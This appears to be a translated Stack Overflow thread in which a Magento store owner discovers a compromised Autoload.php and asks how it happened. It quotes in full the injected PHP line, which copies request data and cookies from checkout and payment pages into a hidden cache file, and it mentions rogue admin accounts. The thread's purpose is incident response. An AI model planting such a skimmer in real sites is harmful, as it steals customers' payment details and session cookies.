从今天早上开始,我得到了以下信息 运行 Magento cronjob 后的 PHP 通知:
Undefined index: REQUEST_URI in /htdocs/lib/Varien/Autoload.php on line 1
我没有修改任何 mage 文件。这怎么可能?
编辑: 现在我已经编辑了 Autoload.php 以首先检查是否设置了 REQUEST_URI。
原文:
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
新:
<?php if(isset($_SERVER["REQUEST_URI"]) && preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
编辑 2015 年 4 月 30 日:
阅读完@volkan 和@b.enoit.be 的评论后,我立即将指定页面替换为来自 Magento 的原始页面,并且该行确实不存在!
以下是 Autoload.php 中存在的恶意行
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>
我也检查过:
- /js/index.php同原
- /index.php同原
- Magpleasure_Filesystem 模块不存在
但是.. 有两个新的管理员用户,他们的名字不详:
- backup - auto_bc@magent.com <-- 这个域名指向一个持有的域名 页面和电子邮件在 Google 上提供俄语结果
- 数据库 - db@local.host
两个用户都已被删除。 该网站也容易受到 shoplift 漏洞利用(已在最新的安全补丁中解决)
我们目前正忙于安装最新的安全补丁。
这似乎是最近的一个问题:
100,000 web shops open to compromise as attackers exploit Magento bug Magento Shoplift Bug Tester v1.0
感谢所有用户的帮助。
最佳答案
看起来您的页面已被破坏,请将文件替换为原始文件,并安装 magento 的安全补丁。检查后端是否有一些新的管理员用户,以及模块 Magpleasure_Filesystem
也检查一下 /js/index.php /index.php
关于php - Mage PHP 通知 : Undefined index: REQUEST_URI in/htdocs/lib/Varien/Autoload. php on line 1,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/29939553/